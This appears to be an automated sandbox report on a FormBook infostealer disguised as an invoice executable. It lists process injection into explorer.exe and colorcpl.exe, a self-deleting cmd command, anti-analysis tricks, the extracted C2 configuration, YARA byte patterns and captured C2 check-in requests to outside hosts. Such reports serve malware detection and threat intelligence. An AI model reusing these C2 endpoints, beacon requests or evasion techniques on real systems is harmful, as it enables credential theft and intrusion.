Loading ...

Play interactive tourEdit tour

Windows Analysis Report commercial invoice_010202201.exe

Overview

General Information

Sample Name:commercial invoice_010202201.exe
Analysis ID:553094
MD5:acbc7357e4fb7d8d4874ecbeb0c5bd0f
SHA1:f423fed0f335e5c31d7b799aba25469420fb6009
SHA256:73f458d7e38ab748b7b7d3b3e680db9eb08d845c1b1b7c935a6ee453d8f03358
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • commercial invoice_010202201.exe (PID: 5136 cmdline: "C:\Users\user\Desktop\commercial invoice_010202201.exe" MD5: ACBC7357E4FB7D8D4874ECBEB0C5BD0F)
    • commercial invoice_010202201.exe (PID: 2280 cmdline: "C:\Users\user\Desktop\commercial invoice_010202201.exe" MD5: ACBC7357E4FB7D8D4874ECBEB0C5BD0F)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 5692 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 2568 cmdline: /c del "C:\Users\user\Desktop\commercial invoice_010202201.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.toposales.com/igwa/"], "decoy": ["listingswithalex.com", "funtabse.com", "aydenwalling.com", "prochal.net", "superfoodsnederland.com", "moldluck.com", "dianekgordon.store", "regionalhomescommercial.com", "mysecuritymadesimple.com", "malwaremastery.com", "kodaikeiko.com", "jrzg996.com", "agricurve.net", "songlingjiu.com", "virginianundahfishingclub.com", "friendschance.com", "pastelpresents.com", "answertitles.com", "survival-hunter.com", "nxfddl.com", "traditionnevertrend.com", "agrovessel.com", "unicorm.digital", "cucumboy.com", "alemdogarimpo.com", "laraful.com", "hexwaa.com", "hanu21st.com", "knoycia.com", "qishengxing.com", "gopipurespices.com", "fdkkrfidkdslsieofkld.info", "elephantspublications.online", "valeriebeijing.com", "xn--42cg2czax6ptae6a.com", "2shengman.com", "sfcshavedice.com", "ragworkhouse.com", "stardomfrokch.xyz", "exoticcenterfold.com", "eventosartifice.com", "test-order-noren.com", "110bao.com", "face-pro.online", "freedomoff.com", "futuresep.com", "tremblock.com", "chocolat-gillotte.com", "speclove.com", "ddflsl.com", "goodnewsmbc.net", "cloudtotaal.com", "goapps-auth.com", "ouch247max.com", "sabra-sd.com", "luxuryneverhurt.art", "rxvendorpills.online", "ludowinners.online", "placemyorder.online", "skyrim.company", "monsterlecturer.com", "controle-fiscal.com", "phoenixinjurylawyer.online", "nanoheadgames.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bec:$sqlite3step: 68 34 1C 7B E1
    • 0x6b08:$sqlite3text: 68 38 2A 90 C5
    • 0x6c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.commercial invoice_010202201.exe.24d0000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.commercial invoice_010202201.exe.24d0000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.commercial invoice_010202201.exe.24d0000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        1.1.commercial invoice_010202201.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.commercial invoice_010202201.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.toposales.com/igwa/"], "decoy": ["listingswithalex.com", "funtabse.com", "aydenwalling.com", "prochal.net", "superfoodsnederland.com", "moldluck.com", "dianekgordon.store", "regionalhomescommercial.com", "mysecuritymadesimple.com", "malwaremastery.com", "kodaikeiko.com", "jrzg996.com", "agricurve.net", "songlingjiu.com", "virginianundahfishingclub.com", "friendschance.com", "pastelpresents.com", "answertitles.com", "survival-hunter.com", "nxfddl.com", "traditionnevertrend.com", "agrovessel.com", "unicorm.digital", "cucumboy.com", "alemdogarimpo.com", "laraful.com", "hexwaa.com", "hanu21st.com", "knoycia.com", "qishengxing.com", "gopipurespices.com", "fdkkrfidkdslsieofkld.info", "elephantspublications.online", "valeriebeijing.com", "xn--42cg2czax6ptae6a.com", "2shengman.com", "sfcshavedice.com", "ragworkhouse.com", "stardomfrokch.xyz", "exoticcenterfold.com", "eventosartifice.com", "test-order-noren.com", "110bao.com", "face-pro.online", "freedomoff.com", "futuresep.com", "tremblock.com", "chocolat-gillotte.com", "speclove.com", "ddflsl.com", "goodnewsmbc.net", "cloudtotaal.com", "goapps-auth.com", "ouch247max.com", "sabra-sd.com", "luxuryneverhurt.art", "rxvendorpills.online", "ludowinners.online", "placemyorder.online", "skyrim.company", "monsterlecturer.com", "controle-fiscal.com", "phoenixinjurylawyer.online", "nanoheadgames.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: commercial invoice_010202201.exeReversingLabs: Detection: 37%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.commercial invoice_010202201.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.commercial invoice_010202201.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.943350067.0000000000DF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734155296.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.683264295.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.943426858.0000000001150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.708365892.000000000EA3D000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734132001.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.684515083.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.684056939.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.681309945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734016685.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://www.toposales.com/igwa/?JXRL2Htp=ma6dGeieA/uMuLPHhGmEMO0MhvgJCSwWTtOunmNNbuA50fkYJarGKThxl5bT79VqZFZn&2dyD8R=k0GLAvira URL Cloud: Label: malware
          Source: http://www.stardomfrokch.xyz/igwa/?JXRL2Htp=fxfNgp9ZS8bh2/dcez9r/a5fPpTZli2HVK4HIQKX3jCJ31NosuhFm2CAaUmyjrkPXZG7&2dyD8R=k0GLAvira URL Cloud: Label: malware
          Source: www.toposales.com/igwa/Avira URL Cloud: Label: malware
          Source: http://www.answertitles.com/igwa/?JXRL2Htp=zipQeNKESZPqCbLQlDCLj4zpqFgOpmaVmA6du1Oyf7pRL9Y+oEdiiyDWqjEEpcoXahJo&2dyD8R=k0GLAvira URL Cloud: Label: malware
          Source: http://www.rxvendorpills.online/igwa/?JXRL2Htp=pt5DjHHXKdbYY+ulYudT7OdutHPMSBHvoYqZ/+0K/RDZ4aBmJwtpu5HKuc6CLarugF7n&2dyD8R=k0GLAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nshDF13.tmp\uajs.dllReversingLabs: Detection: 16%
          Machine Learning detection for sampleShow sources
          Source: commercial invoice_010202201.exeJoe Sandbox ML: detected
          Source: 0.2.commercial invoice_010202201.exe.24d0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.colorcpl.exe.b83930.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.commercial invoice_010202201.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.commercial invoice_010202201.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.commercial invoice_010202201.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.commercial invoice_010202201.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.commercial invoice_010202201.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.commercial invoice_010202201.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.colorcpl.exe.4e3796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: commercial invoice_010202201.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: colorcpl.pdbGCTL source: commercial invoice_010202201.exe, 00000001.00000002.734183183.0000000000960000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: commercial invoice_010202201.exe, 00000001.00000002.734183183.0000000000960000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: commercial invoice_010202201.exe, 00000000.00000003.681356710.00000000030A0000.00000004.00000001.sdmp, commercial invoice_010202201.exe, 00000000.00000003.683908574.0000000003230000.00000004.00000001.sdmp, commercial invoice_010202201.exe, 00000001.00000002.734202517.00000000009D0000.00000040.00000001.sdmp, commercial invoice_010202201.exe, 00000001.00000002.734364645.0000000000AEF000.00000040.00000001.sdmp, commercial invoice_010202201.exe, 00000001.00000003.684222462.00000000006A0000.00000004.00000001.sdmp, colorcpl.exe, 00000007.00000002.944151655.0000000004A1F000.00000040.00000001.sdmp, colorcpl.exe, 00000007.00000002.944001082.0000000004900000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: commercial invoice_010202201.exe, commercial invoice_010202201.exe, 00000001.00000002.734202517.00000000009D0000.00000040.00000001.sdmp, commercial invoice_010202201.exe, 00000001.00000002.734364645.0000000000AEF000.00000040.00000001.sdmp, commercial invoice_010202201.exe, 00000001.00000003.684222462.00000000006A0000.00000004.00000001.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000002.944151655.0000000004A1F000.00000040.00000001.sdmp, colorcpl.exe, 00000007.00000002.944001082.0000000004900000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_00402630 FindFirstFileA,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49817 -> 198.54.117.211:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49817 -> 198.54.117.211:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49817 -> 198.54.117.211:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49846 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49846 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49846 -> 34.102.136.180:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.sfcshavedice.com
          Source: C:\Windows\explorer.exeDomain query: www.survival-hunter.com
          Source: C:\Windows\explorer.exeDomain query: www.ludowinners.online
          Source: C:\Windows\explorer.exeDomain query: www.moldluck.com
          Source: C:\Windows\explorer.exeNetwork Connect: 118.67.131.217 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.200 80
          Source: C:\Windows\explorer.exeNetwork Connect: 109.106.254.15 80
          Source: C:\Windows\explorer.exeDomain query: www.answertitles.com
          Source: C:\Windows\explorer.exeDomain query: www.stardomfrokch.xyz
          Source: C:\Windows\explorer.exeDomain query: www.toposales.com
          Source: C:\Windows\explorer.exeDomain query: www.friendschance.com
          Source: C:\Windows\explorer.exeDomain query: www.cloudtotaal.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.211 80
          Source: C:\Windows\explorer.exeDomain query: www.rxvendorpills.online
          Source: C:\Windows\explorer.exeDomain query: www.controle-fiscal.com
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
          Source: C:\Windows\explorer.exeNetwork Connect: 89.17.204.228 80
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.stardomfrokch.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.toposales.com/igwa/
          Source: Joe Sandbox ViewASN Name: CLEAR-AS-APClearNetworksPtyLtdAU CLEAR-AS-APClearNetworksPtyLtdAU
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=zipQeNKESZPqCbLQlDCLj4zpqFgOpmaVmA6du1Oyf7pRL9Y+oEdiiyDWqjEEpcoXahJo&2dyD8R=k0GL HTTP/1.1Host: www.answertitles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=kcJK5GFpDKPtevBg1nN4AS2uwE6IDbqQL9Esa69lHd4fhlo3nfdugBZ3P+KHWdbb77iO&2dyD8R=k0GL HTTP/1.1Host: www.friendschance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=iLZ1RFWiw0U4S9E0pDZlJcjoptUhYXlNWk90HzYHcuVmRCYph1Gowzt+bYvcpjSVMV+b&2dyD8R=k0GL HTTP/1.1Host: www.sfcshavedice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=pt5DjHHXKdbYY+ulYudT7OdutHPMSBHvoYqZ/+0K/RDZ4aBmJwtpu5HKuc6CLarugF7n&2dyD8R=k0GL HTTP/1.1Host: www.rxvendorpills.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=P7cOGMhGan+iOds35nuUwcQL6AiWu3hpp80V2Eae8ndsAihNyn6owzlv0a79YI8S4Mj0&2dyD8R=k0GL HTTP/1.1Host: www.ludowinners.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=fxfNgp9ZS8bh2/dcez9r/a5fPpTZli2HVK4HIQKX3jCJ31NosuhFm2CAaUmyjrkPXZG7&2dyD8R=k0GL HTTP/1.1Host: www.stardomfrokch.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=ma6dGeieA/uMuLPHhGmEMO0MhvgJCSwWTtOunmNNbuA50fkYJarGKThxl5bT79VqZFZn&2dyD8R=k0GL HTTP/1.1Host: www.toposales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=XkWoyKtjfo1nTXOdSlOCxSRnTVDbDlQTsKZVtKCHx1ue89AIkDfi+mwVckT9NwCZj6NC&2dyD8R=k0GL HTTP/1.1Host: www.survival-hunter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 118.67.131.217 118.67.131.217
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 14 Jan 2022 09:21:52 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Fri, 26 Mar 2021 09:43:38 GMTetag: "999-605dacca-1fd7389c82cb2d72;;;"accept-ranges: bytescontent-length: 2457date: Fri, 14 Jan 2022 09:21:58 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 